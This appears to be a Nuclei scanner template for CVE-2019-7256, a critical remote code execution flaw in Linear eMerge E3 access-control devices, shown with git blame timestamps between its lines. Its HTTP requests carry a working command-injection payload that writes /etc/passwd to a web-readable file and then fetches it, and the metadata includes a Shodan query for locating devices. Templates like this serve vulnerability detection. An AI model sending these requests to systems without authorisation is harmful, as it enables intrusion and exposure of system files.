2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-7256
|
2020-09-06 11:55:23 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: eMerge E3 1.00-06 - Remote Code Execution
|
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
2023-05-18 15:52:33 +00:00
|
|
|
description: |
|
|
|
|
Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
|
2023-09-06 12:53:28 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patch or update to a non-vulnerable version of eMerge E3.
|
2021-08-19 13:15:35 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/47619
|
2022-02-21 18:33:16 +00:00
|
|
|
- http://linear-solutions.com/nsc_family/e3-series/
|
2022-05-09 16:12:52 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7256
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://applied-risk.com/labs/advisories
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://www.applied-risk.com/resources/ar-2019-005
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
2022-10-14 09:24:23 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
2022-05-17 09:18:12 +00:00
|
|
|
cvss-score: 10
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-7256
|
|
|
|
cwe-id: CWE-78
|
2024-01-14 13:49:27 +00:00
|
|
|
epss-score: 0.97388
|
|
|
|
epss-percentile: 0.99904
|
2023-09-06 12:53:28 +00:00
|
|
|
cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 12:53:28 +00:00
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: nortekcontrol
|
|
|
|
product: linear_emerge_essential_firmware
|
2023-09-06 12:53:28 +00:00
|
|
|
shodan-query: title:"eMerge"
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2019,emerge,rce,edb,nortekcontrol
|
2023-05-18 15:52:33 +00:00
|
|
|
variables:
|
|
|
|
file: "{{rand_text_alpha(10)}}"
|
2020-09-06 11:55:23 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-09-08 12:17:19 +00:00
|
|
|
- raw:
|
2020-09-06 12:06:45 +00:00
|
|
|
- |
|
2023-05-18 15:52:33 +00:00
|
|
|
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1
|
2020-09-06 11:55:23 +00:00
|
|
|
Host: {{Hostname}}
|
2020-09-06 12:06:45 +00:00
|
|
|
- |
|
2023-05-18 15:52:33 +00:00
|
|
|
GET /{{file}}.txt HTTP/1.1
|
2020-09-06 11:55:23 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
2020-09-06 20:52:50 +00:00
|
|
|
matchers-condition: and
|
2020-09-06 11:55:23 +00:00
|
|
|
matchers:
|
2020-09-18 14:58:38 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0:"
|
2022-05-09 16:12:52 +00:00
|
|
|
|
2023-05-18 15:52:33 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-12-29 09:30:44 +00:00
|
|
|
# digest: 4b0a00483046022100e641270194c8d005550f85f721cc5f36f56d99d98d0d3093786d7e9c307b78af022100c53fdac1bcf6659d796abbe1eca0120a3a955aa39ccd8050e25cb84a73c313d1:922c64590222798bb761d5b6d8e72950
|